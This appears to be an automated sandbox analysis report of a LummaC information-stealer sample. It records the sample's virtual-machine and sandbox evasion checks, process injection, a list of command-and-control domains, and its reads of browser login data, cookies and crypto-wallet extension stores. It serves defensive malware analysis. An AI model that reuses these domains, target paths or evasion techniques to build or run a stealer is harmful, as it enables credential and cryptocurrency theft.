Source: C:\Users\user\Desktop\download.bin.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Users\user\Desktop\download.bin.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\download.bin.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: download.bin.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: download.bin.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: download.bin.exe

Static file information: File size 1139712 > 1048576

Source: download.bin.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x115a00

Source: download.bin.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: download.bin.exe, 00000000.00000002.1702508061.0000000004269000.00000004.00000800.00020000.00000000.sdmp, download.bin.exe, 00000000.00000002.1705279369.0000000005CB0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: download.bin.exe, 00000000.00000002.1702508061.0000000004269000.00000004.00000800.00020000.00000000.sdmp, download.bin.exe, 00000000.00000002.1705279369.0000000005CB0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: download.bin.exe, 00000000.00000002.1704831020.0000000005A60000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: download.bin.exe, 00000000.00000002.1704831020.0000000005A60000.00000004.08000000.00040000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.download.bin.exe.4364ae8.0.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.download.bin.exe.4364ae8.0.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.download.bin.exe.4364ae8.0.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 0.2.download.bin.exe.5cb0000.4.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.download.bin.exe.5cb0000.4.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.download.bin.exe.5cb0000.4.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 0.2.download.bin.exe.5a60000.3.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 0.2.download.bin.exe.5a60000.3.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 0.2.download.bin.exe.5a60000.3.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 0.2.download.bin.exe.5a60000.3.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 0.2.download.bin.exe.5a60000.3.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull

Yara detected Costura Assembly Loader

Source: Yara match	File source: 0.2.download.bin.exe.59c0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1704566054.00000000059C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1689222896.00000000031C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: download.bin.exe PID: 7068, type: MEMORYSTR

Source: C:\Users\user\Desktop\download.bin.exe	Code function: 0_2_058545C5 push esp; ret	0_2_058545C6
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 0_2_05851913 push eax; ret	0_2_0585191D
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 0_2_05A5AF11 push ebp; iretd	0_2_05A5AF18
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 0_2_05C07551 push 4C05A4B7h; iretd	0_2_05C0755D
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 0_2_05C3E657 push esp; iretd	0_2_05C3E661
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 0_2_05C3CF87 push ss; iretd	0_2_05C3CF8D
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 0_2_05C3CF70 push ecx; iretd	0_2_05C3CF71
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 0_2_05D6ED5F pushad ; retf 0005h	0_2_05D6ED6A
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 0_2_05D6ED07 pushad ; retf 0005h	0_2_05D6ED12
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 0_2_05D6ECF8 pushad ; retf 0005h	0_2_05D6ED02
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 0_2_05D6ECA0 pushad ; retf 0005h	0_2_05D6ED12
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 0_2_05D6FC5B pushad ; iretd	0_2_05D6FC61
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 0_2_05D6B7E0 push edi; retf 0005h	0_2_05D6B7EA
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 0_2_05D6B6C7 push eax; retf 0005h	0_2_05D6B6D2
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 0_2_05D6AE82 push eax; iretd	0_2_05D6AE83
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 0_2_05D6B8AF push esp; retf 0005h	0_2_05D6B8B9
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 0_2_05D6B8A9 push ebp; retf 0005h	0_2_05D6B8AA
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 0_2_05D69045 pushad ; retf 0005h	0_2_05D69059
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 0_2_05D6B86F push esi; retf 0005h	0_2_05D6B87A
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_0044B016 push ecx; retf 0042h	1_2_0044B021
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_0044A894 push ecx; retf 0042h	1_2_0044A895
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_00446A6E pushad ; iretd	1_2_00446A78
Source: C:\Users\user\Desktop\download.bin.exe	Code function: 1_2_004497AC push es; ret	1_2_004497AD

Source: download.bin.exe

Static PE information: section name: .text entropy: 7.9877336038907885

Source: C:\Users\user\Desktop\download.bin.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\download.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: download.bin.exe PID: 7068, type: MEMORYSTR

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\download.bin.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\download.bin.exe

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: download.bin.exe, 00000000.00000002.1689222896.00000000031C1000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\download.bin.exe	Memory allocated: 1800000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Memory allocated: 31C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Memory allocated: 51C0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\download.bin.exe

Window / User API: threadDelayed 7008

Jump to behavior

Source: C:\Users\user\Desktop\download.bin.exe TID: 5480	Thread sleep time: -180000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe TID: 4464	Thread sleep count: 7008 > 30			Jump to behavior

Source: C:\Users\user\Desktop\download.bin.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\Desktop\download.bin.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\download.bin.exe	Last function: Thread delayed

Source: download.bin.exe, 00000000.00000002.1689222896.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SerialNumber0VMware\|VIRTUAL\|A M I\|XenDselect * from Win32_ComputerSystem
Source: download.bin.exe, 00000001.00000002.2928084364.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp, download.bin.exe, 00000001.00000002.2927901414.0000000000CBC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: download.bin.exe, 00000000.00000002.1689222896.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: model0Microsoft\|VMWare\|Virtual

Source: C:\Users\user\Desktop\download.bin.exe

API call chain: ExitProcess graph end node

graph_1-14324

Source: C:\Users\user\Desktop\download.bin.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\download.bin.exe

Code function: 1_2_00440FD0 LdrInitializeThunk,

1_2_00440FD0

Source: C:\Users\user\Desktop\download.bin.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\download.bin.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\download.bin.exe

Memory written: C:\Users\user\Desktop\download.bin.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: download.bin.exe, 00000000.00000002.1689222896.0000000003760000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: cloudewahsj.shop
Source: download.bin.exe, 00000000.00000002.1689222896.0000000003760000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: rabidcowse.shop
Source: download.bin.exe, 00000000.00000002.1689222896.0000000003760000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: noisycuttej.shop
Source: download.bin.exe, 00000000.00000002.1689222896.0000000003760000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tirepublicerj.shop
Source: download.bin.exe, 00000000.00000002.1689222896.0000000003760000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: framekgirus.shop
Source: download.bin.exe, 00000000.00000002.1689222896.0000000003760000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: wholersorie.shop
Source: download.bin.exe, 00000000.00000002.1689222896.0000000003760000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: abruptyopsn.shop
Source: download.bin.exe, 00000000.00000002.1689222896.0000000003760000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: nearycrepso.shop
Source: download.bin.exe, 00000000.00000002.1689222896.0000000003760000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: traygullibalkerj.click

Source: C:\Users\user\Desktop\download.bin.exe

Process created: C:\Users\user\Desktop\download.bin.exe "C:\Users\user\Desktop\download.bin.exe"

Jump to behavior

Source: C:\Users\user\Desktop\download.bin.exe	Queries volume information: C:\Users\user\Desktop\download.bin.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\download.bin.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\download.bin.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: download.bin.exe PID: 5440, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: download.bin.exe, 00000001.00000002.2928133938.0000000000D0A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum
Source: download.bin.exe, 00000001.00000002.2928133938.0000000000D0A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: download.bin.exe, 00000001.00000002.2928133938.0000000000D0A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: download.bin.exe, 00000001.00000002.2928133938.0000000000D0A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ExodusWeb3
Source: download.bin.exe, 00000000.00000002.1704193923.0000000005890000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: set_UseMachineKeyStore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\download.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
